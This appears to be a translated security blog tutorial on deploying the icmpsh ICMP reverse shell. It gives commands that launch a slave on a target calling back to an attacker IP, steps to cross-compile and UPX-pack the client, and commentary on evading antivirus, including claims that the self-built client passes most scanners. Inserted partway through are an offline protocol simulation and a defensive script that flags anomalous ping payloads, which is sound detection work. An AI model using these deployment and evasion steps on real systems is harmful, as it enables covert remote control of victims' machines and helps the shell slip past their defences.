Let's talk about shells.
When it comes to shells, I'm sure everyone is familiar with them, and I expect each of you has a few favourites. Grouped by platform they fall into two broad categories: shells for the web layer and shells for the system layer. Web shells are further split by language into PHP, JSP and ASP (which reminds me of all the backdoors I wrote back in the day......), while system-level shells are generally split into Windows backdoors and Unix backdoors. I have never seen an Apple (macOS) backdoor to this day, probably because I'm too poor to own a Mac.
To put it bluntly, what I want to talk about today is a system-level shell backdoor. Please don't flame me; the article is fairly light, so feel free to skip it.
0x01 Classification
Here I will first classify shells by the protocol they use.
First, the TCP/UDP-based shell
This kind of shell is the most widely used and the most capable, because a trojan built on these two protocols has the richest communication channel. Of course, it is also the easiest to attract attention: more and more security vendors concentrate on exactly these backdoors. The result is that such trojans generally need industrial-grade AV evasion; once an AV product intercepts one, the implant is useless and the evasion has to be redone, which gets expensive. Ordinary people simply cannot afford to play this game.
Second, the ICMP-based shell
The protocols a host normally speaks directly over IP are essentially TCP, UDP and ICMP. Now that the first two are off the table, let's take a look at ICMP.
Since it is a communication protocol it can certainly carry data, so let's look at what data a ping actually sends:
The figure shows it clearly: the first capture is the data sent by a Windows ping, the second the data sent by a Linux ping, and they differ slightly. Windows fills its 32-byte payload with the repeated alphabet "abcdefghijklmnopqrstuvwabcdefghi"; Linux (iputils ping) sends a 56-byte payload that begins with a timestamp and is then filled with an incrementing byte pattern.
This proves that ICMP packets can carry whatever data we want, at least in theory: the echo payload is opaque to the network, which simply delivers it and echoes it back.
Then, the DNS-based shell
Besides those three protocols there is also a backdoor shell that rides on DNS resolution. I remember someone posting a sneaky trick for getting online through the CMCC (or ChinaNet) captive portal without logging in; it used DNS. There was also a trojan that transmitted its data this way, an even more cumbersome setup that one simply couldn't bear to look at..
A DNS-resolution backdoor naturally has its advantage, namely that it is very hard to detect (though the unusual query volume and long subdomains do stand out to anyone who is actually looking), but it also has an equally natural drawback: the data moves slowly. Not ordinarily slowly. Advanced functions such as remote desktop control are basically impossible, and the implementation is somewhat involved. So we will leave it aside for now and come back to it later.
After dividing by protocol, let's classify by connection direction.
Connections are either active or passive (from the attacker's point of view): the active connection is the Bind Shell and the passive one is the Reverse Shell. I assume you are familiar with both; here I will briefly explain the two images (the images are from the web).
With a Bind Shell the backdoor listens on a port on the target and the attacker connects to it, which only works if that port is reachable from outside. With a Reverse Shell the compromised host actively connects back to the attacker's machine; this is what mainstream shells use today. Its disadvantage is that the attacker's machine must have a fixed, reachable public IP address; its advantage is that you need not worry about the target's dynamic IP address breaking the connection.
However, whether it is a Bind Shell or a Reverse Shell, both run over TCP or UDP, which is exactly what firewalls watch and filter by port, so they are easily blocked. Even if our backdoor has passed the AV test, this round can still make it fail. (ICMP is not invisible either: a host firewall can drop echo traffic, and a packet capture shows the payload, as we will see.)
What I want to share with you today is: the ICMP Reverse Shell
0x02 Test platform overview
First we need a shell that communicates over ICMP. Of course you can write your own; the principle is just communication. ICMP is used to deliver the shell command we want to execute from the server (the master) to the client (the slave); the client executes it, passes the resulting data back inside ICMP packets, and the server receives it and echoes it to us. In icmpsh specifically, the slave polls by sending ICMP echo requests and the master answers with echo replies that carry the commands, so from the network's point of view the target is merely pinging the attacker.
Here we pick an ICMP shell project from GitHub for the actual run.
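To make the master/slave exchange concrete, here is an added example (my own code, not icmpsh's) that models it offline: it builds and checksums real ICMP echo messages, lets a Slave poll a Master with echo requests whose payload carries command output, and lets the Master answer with echo replies whose payload carries the operator's input. The -s and -b behaviour is modelled as max_data and max_blanks; the fake_cmd table stands in for the cmd.exe pipe the real slave drives; the ICMP id 0x4242, the command names and their output are assumptions. It never opens a socket.

```python
import struct
from typing import Callable, Dict, List

ICMP_ECHO_REPLY = 0
ICMP_ECHO_REQUEST = 8


def icmp_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum over ICMP header + payload."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_icmp(msg_type: int, ident: int, seq: int, payload: bytes) -> bytes:
    """Serialise an echo message: type, code, checksum, id, seq, then the opaque payload."""
    header = struct.pack("!BBHHH", msg_type, 0, 0, ident, seq)
    csum = icmp_checksum(header + payload)
    return struct.pack("!BBHHH", msg_type, 0, csum, ident, seq) + payload


def parse_icmp(packet: bytes) -> Dict[str, object]:
    """Parse a raw ICMP message (no IP header); a valid one checksums to zero."""
    if len(packet) < 8 or icmp_checksum(packet) != 0:
        raise ValueError("short or corrupt ICMP packet")
    msg_type, code, _, ident, seq = struct.unpack("!BBHHH", packet[:8])
    return {"type": msg_type, "code": code, "id": ident, "seq": seq, "payload": packet[8:]}


class Master:
    """Attacker side: every echo request gets an echo reply carrying whatever the operator typed."""

    def __init__(self) -> None:
        self.pending = b""   # operator input not yet delivered
        self.received = b""  # command output streamed back by the slave

    def queue_input(self, line: str) -> None:
        self.pending += line.encode() + b"\n"

    def on_request(self, packet: bytes) -> bytes:
        req = parse_icmp(packet)
        if req["type"] != ICMP_ECHO_REQUEST:
            raise ValueError("master only answers echo requests")
        self.received += req["payload"]
        data, self.pending = self.pending, b""
        return build_icmp(ICMP_ECHO_REPLY, req["id"], req["seq"], data)


class Slave:
    """Target side: polls with echo requests; max_data mirrors -s, max_blanks mirrors -b."""

    def __init__(self, ident: int, run: Callable[[bytes], bytes],
                 max_data: int = 128, max_blanks: int = 30) -> None:
        self.ident, self.run, self.max_data, self.max_blanks = ident, run, max_data, max_blanks
        self.seq, self.blanks, self.outbuf, self.alive = 0, 0, b"", True

    def next_request(self) -> bytes:
        # Output is drained max_data bytes per packet; an idle poll carries an empty payload.
        chunk, self.outbuf = self.outbuf[:self.max_data], self.outbuf[self.max_data:]
        self.seq += 1
        return build_icmp(ICMP_ECHO_REQUEST, self.ident, self.seq, chunk)

    def on_reply(self, packet: bytes) -> None:
        rep = parse_icmp(packet)
        if rep["type"] != ICMP_ECHO_REPLY or rep["id"] != self.ident:
            return  # somebody else's ping reply, ignore it
        self.blanks = 0
        if rep["payload"]:
            self.outbuf += self.run(rep["payload"])

    def on_timeout(self) -> None:
        self.blanks += 1
        if self.blanks >= self.max_blanks:
            self.alive = False


def fake_cmd(line: bytes) -> bytes:
    """Stand-in for the cmd.exe pipe the real slave drives (constructed for this example)."""
    table = {b"whoami\n": b"lab\\user\r\n", b"hostname\n": b"WIN-TARGET\r\n",
             b"type notes.txt\n": b"A" * 300}
    return table.get(line, b"'" + line.strip() + b"' is not recognized\r\n")


def run_session(commands: List[str], max_data: int = 128, answer: bool = True) -> Dict[str, object]:
    """Drive one offline session; returns the output the master collected and the request count."""
    queue, packets = list(commands), 0
    master, slave = Master(), Slave(ident=0x4242, run=fake_cmd, max_data=max_data)
    while slave.alive:
        if queue:
            master.queue_input(queue.pop(0))
        request = slave.next_request()
        packets += 1
        if not answer:  # master unreachable: the slave counts blanks and eventually quits
            slave.on_timeout()
            continue
        slave.on_reply(master.on_request(request))
        if not queue and not slave.outbuf:
            break
    return {"output": master.received, "requests": packets}


if __name__ == "__main__":
    print(run_session(["whoami", "hostname"]))
```

Two things the model makes visible: a command's output only travels in the slave's next poll, so the 500 ms -d delay is also the shell's latency, and output longer than -s bytes needs several echo requests, which is why a chatty command produces a burst of "pings".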
Clone the project locally:
git clone https://github.com/inquisb/icmpsh.git /opt/icmp_reverse_shell
After cloning we can see the files above. Everything is open source, so the detailed workings are there to read. icmpsh_m.py is the master script that runs on our server; icmpsh-s.c is the source of the slave, the client that runs on the target, and interested readers should take a look at it. There is also run.sh, a BASH wrapper whose contents you can read for yourself: it mainly takes care of the setup you would otherwise forget (it disables the kernel's own ICMP echo replies through the net.ipv4.icmp_echo_ignore_all sysctl, so that the master's raw socket rather than the kernel answers the slave's pings) and then launches icmpsh_m.py. So on the server side we use run.sh.
0x03 Drill
After all that talk, let's get started.
Server side first:
./run.sh
Then enter the IP address as prompted. In a real deployment this would be a public IP address, but the test here runs on an internal network, so I enter the LAN (C-segment) address, press Enter, and see the prompt:
With that, the server is configured and listening.
Now the client:
Open cmd on the target and enter the following command:
icmpsh.exe -t 192.168.246.129 -d 500 -b 30 -s 128
Here -t is the master's address, -d the delay in milliseconds between echo requests, -b the number of unanswered requests the slave tolerates before quitting, and -s the maximum data size per packet.
At this point we can do whatever we like in the shell.
The commands typed into the shell have all executed, yet nothing at all shows on the target's side.
Now for the fun part. All the target appears to be doing is pinging the attacker, but on the attacker's side what arrives inside those pings is a whole conversation, with the "hi" sitting right there in the payload, hidden in plain sight...
Capture it with Wireshark and, sure enough, the data is all there.
That is how it works.
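What the Wireshark capture shows by eye can be turned into a detection rule. The following is an added example (my own code, not icmpsh's) that classifies echo-request payloads against the stock Windows and Linux ping patterns from 0x01 and flags any (source, ICMP id) stream whose payloads deviate from those patterns, are empty, or change size. The sample records, addresses and ICMP ids are constructed; parsing the IP and ICMP headers out of a pcap is left to whatever capture tool feeds it. A plain Windows `ping -l 0` would trip the empty-payload reason too, so treat that one as a weak signal on its own.

```python
from collections import defaultdict
from typing import Dict, List, Tuple

# Default echo-request payloads of the two ping implementations discussed above.
# Windows sends 32 bytes of the repeated alphabet; iputils ping on Linux sends 56 bytes that
# start with a struct timeval (8 bytes on 32-bit builds, 16 on 64-bit) and then fill every
# remaining byte with its own offset (0x10, 0x11, ... 0x37 on a 64-bit build).
WINDOWS_PING = b"abcdefghijklmnopqrstuvwabcdefghi"


def looks_like_linux_ping(payload: bytes) -> bool:
    """True if the bytes after an 8- or 16-byte timestamp follow the counting pattern."""
    for ts_len in (8, 16):
        if len(payload) >= ts_len + 8 and all(
            payload[i] == (i & 0xFF) for i in range(ts_len, len(payload))
        ):
            return True
    return False


def classify_payload(payload: bytes) -> str:
    """Label one echo-request payload; anything that is not a stock ping pattern is anomalous."""
    if not payload:
        return "empty"
    if payload == WINDOWS_PING:
        return "windows-ping"
    if looks_like_linux_ping(payload):
        return "linux-ping"
    return "anomalous"


Record = Tuple[str, int, int, bytes]  # (source IP, ICMP id, ICMP seq, payload)


def flag_streams(records: List[Record]) -> Dict[Tuple[str, int], List[str]]:
    """Group echo requests by (source, id) and return the reasons each suspicious stream was flagged."""
    streams: Dict[Tuple[str, int], List[bytes]] = defaultdict(list)
    for src, ident, _seq, payload in records:
        streams[(src, ident)].append(payload)
    flagged: Dict[Tuple[str, int], List[str]] = {}
    for key, payloads in streams.items():
        labels = [classify_payload(p) for p in payloads]
        reasons = []
        if "anomalous" in labels:
            reasons.append("payload is not a stock ping pattern")
        if "empty" in labels:
            reasons.append("empty echo payload (icmpsh-style idle poll)")
        if len({len(p) for p in payloads}) > 1:
            reasons.append("payload size varies within one ICMP id")
        if reasons:
            flagged[key] = reasons
    return flagged


# Constructed sample capture: two ordinary pings and one icmpsh session from 192.168.246.130.
LINUX_PING = bytes(8) + bytes(i & 0xFF for i in range(8, 56))  # zeroed timestamp + counting pattern
SAMPLE_RECORDS: List[Record] = [
    ("10.0.0.5", 1, 1, WINDOWS_PING),
    ("10.0.0.5", 1, 2, WINDOWS_PING),
    ("10.0.0.7", 0x1A2B, 1, LINUX_PING),
    ("10.0.0.7", 0x1A2B, 2, LINUX_PING),
    ("192.168.246.130", 0x4242, 1, b""),
    ("192.168.246.130", 0x4242, 2, b""),
    ("192.168.246.130", 0x4242, 3, b"lab\\user\r\n"),
    ("192.168.246.130", 0x4242, 4, b""),
]

if __name__ == "__main__":
    for key, reasons in flag_streams(SAMPLE_RECORDS).items():
        print(key, reasons)
```

The size check is the cheap, implementation-agnostic one: a genuine ping keeps its payload length constant for the whole run, whereas a shell over ICMP has to vary it with the output it carries.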
0x04 About the shell client
The first issue is the platform the client runs on. Clearly the client (the slave) is Windows-only, while the server (the master) is POSIX-portable; the project ships it in C, Perl and Python.
Next, where the client comes from. You can of course use the exe the author provides on GitHub, or read the source file, compile it yourself and then pack it. The compile process is as follows (only the Linux procedure is described here):
First install MinGW, which is the key to cross-compiling:
sudo apt-get update
sudo apt-get install gcc-mingw32
(On newer Debian/Ubuntu releases the package is called mingw-w64.) During installation apt pulls in the remaining dependencies itself, so we need not worry about them.
After installation, compile:
i686-w64-mingw32-gcc icmpsh-s.c -o icmp-slave.exe
Then we can pack it with UPX:
upx -v icmp-slave.exe -o icmp-slave-upx.exe
And the client is ready. We can see the compression ratio is about 56%, and the packed file is about 56 KB.
Apart from the above, I think the most important question is how AV responds to the shell. Attentive readers will have noticed that in the example above my target was running 360 throughout the experiment (not on purpose; it had been installed on the target during a previous test). And not just 360: up to the time of writing, the vast majority of AV products have not flagged it.
Of course, I am talking about my own compiled client here. As for the client that ships with the repository, domestic AV has basically all detected it.
But I am poor..
For a more thorough test I will paste the virustotal.com results here:
First, we find that most domestic vendors flag the client that ships with the repository. I am quite pleased to see that. :)
Then let's look at the self-compiled exe with the UPX pack added. Well, what is going on there...
Then let's look at the freshly compiled, unpacked one. That seems even stranger..
It seems AV is getting ever more sensitive to UPX, so don't use it to pack the client. As for the other strange phenomena... why? UFO!
0x05 Postscript
That concludes the introduction to the ICMP reverse shell. None of this is really new and the technique is not complicated; the point is the idea, and on top of this implementation you can build more, and sneakier, ways of playing. That is the end of this piece.